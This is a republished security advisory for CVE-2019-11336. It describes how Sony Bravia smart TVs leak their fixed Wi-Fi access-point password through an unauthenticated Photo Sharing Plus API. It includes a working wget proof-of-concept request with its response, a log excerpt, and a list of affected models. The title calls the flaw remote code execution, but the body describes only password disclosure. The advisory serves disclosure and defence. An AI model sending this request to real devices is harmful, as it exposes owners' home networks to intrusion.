Sony XBR-77A1E Remote Code Execution Vulnerability

Summary

Sony Bravia Smart TV devices allow remote attackers to retrieve the static Wi-Fi password (used when the TV is acting as an access point) by using the Photo Sharing Plus application to execute a backdoor API command, a different vulnerability than CVE-2019-10886.

Credit:

The information has been provided by xen1thLabs.
The original article can be found at: http://seclists.org/fulldisclosure/2019/Apr/32


Details

An unauthenticated remote attacker can retrieve the plaintext wireless password through the “Photo Sharing Plus” API.

After starting the application, the following example retrieves the wireless password created from the TV (IP address of the TV is 192.168.1.102) over the LAN, without authentication:

“`
root@kali:~# wget -qO- –post-data='{“id”:80,”method”:”getContentShareServerInfo”,”params”:[],”version”:”1.0″}’
http://[ip_tv]:10000/contentshare/
{“result”:[{“ssid”:”DIRECT-GD-BRAVIA”,”keyType”:””,”key”:”8362tbwX”,”deviceName”:””,”url”:”http:\/\/192.168.49.1″,”touchPadRemote”:”notSupported”}],”id”:80}
““

The password is 8362tbwX.

By reading logs of the TV, we can confirm the password has been delivered over
HTTP, without authentication. The logs contain password in plain-text:

“`
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send:
{“result”:[{“ssid”:”DIRECT-GD-BRAVIA”,”keyType”:””,”key”:”8362tbwX”,”deviceName”:””,”url”:”http:\/\/192.168.49.1″,”touchPadRemote”:”notSupported”}],”id”:80}
““

It is also important to note that the generated Wireless password by the TV is always the same. Even after a hard reboot and a disconnection from the power supply, the generated password will be always the same. This lack of randomness is also a security issue.

Vulnerable Systems:

  • Sony XBR-77A1E
  • Sony XBR-75Z9D
  • Sony XBR-75X945C
  • Sony XBR-75X940E
  • Sony XBR-75X940D
  • Sony XBR-75X940C
  • Sony XBR-75X910C
  • Sony XBR-75X900E
  • Sony XBR-75X857D
  • Sony XBR-75X855D
  • Sony XBR-75X855C
  • Sony XBR-75X850E
  • Sony XBR-75X850D
  • Sony XBR-75X850C
  • Sony XBR-65Z9D
  • Sony XBR-65X937D
  • Sony XBR-65X935D
  • Sony XBR-65X930E
  • Sony XBR-65X930D
  • Sony XBR-65X930C
  • Sony XBR-65X907C
  • Sony XBR-65X905C
  • Sony XBR-65X900E
  • Sony XBR-65X900C
  • Sony XBR-65X857D
  • Sony XBR-65X857C
  • Sony XBR-65X855D
  • Sony XBR-65X855C
  • Sony XBR-65X850E
  • Sony XBR-65X850D
  • Sony XBR-65X850C
  • Sony XBR-65X810C
  • Sony XBR-65X809C
  • Sony XBR-65X807C
  • Sony XBR-65X805C
  • Sony XBR-65X800C
  • Sony XBR-65X750D
  • Sony XBR-65A1E
  • Sony XBR-55X930E
  • Sony XBR-55X930D
  • Sony XBR-55X907C
  • Sony XBR-55X905C
  • Sony XBR-55X900E
  • Sony XBR-55X900C
  • Sony XBR-55X857D
  • Sony XBR-55X857C
  • Sony XBR-55X855D
  • Sony XBR-55X855C
  • Sony XBR-55X850D
  • Sony XBR-55X850C
  • Sony XBR-55X810C
  • Sony XBR-55X809C
  • Sony XBR-55X807C
  • Sony XBR-55X806E
  • Sony XBR-55X805C
  • Sony XBR-55X800E
  • Sony XBR-55X700D
  • Sony XBR-55A1E
  • Sony XBR-49X900E
  • Sony XBR-49X839C
  • Sony XBR-49X837C
  • Sony XBR-49X835D
  • Sony XBR-49X835C
  • Sony XBR-49X830C
  • Sony XBR-49X800E
  • Sony XBR-49X800D
  • Sony XBR-49X800C
  • Sony XBR-49X700D
  • Sony XBR-43X830C
  • Sony XBR-43X800E
  • Sony XBR-43X800D
  • Sony XBR-100Z9D
  • Sony X7500D
  • Sony Photo Sharing Plus PKG6.560
  • Sony Photo Sharing Plus PKG6.2858
  • Sony Photo Sharing Plus PKG6.2671
  • Sony Photo Sharing Plus PKG5.381
  • Sony Photo Sharing Plus PKG3925
  • Sony Photo Sharing Plus PKG3885
  • Sony Photo Sharing Plus PKG3865
  • Sony KDL-75W855C
  • Sony KDL-75W850C
  • Sony KDL-65W857C
  • Sony KDL-65W855C
  • Sony KDL-65W850C
  • Sony KDL-55W805C
  • Sony KDL-55W800C
  • Sony KDL-50W820C
  • Sony KDL-50W809C
  • Sony KDL-50W807C
  • Sony KDL-50W805C
  • Sony KDL-50W800C

CVE Information:
CVE-2019-11336

Disclosure Timeline:
Publish Date:05/14/2019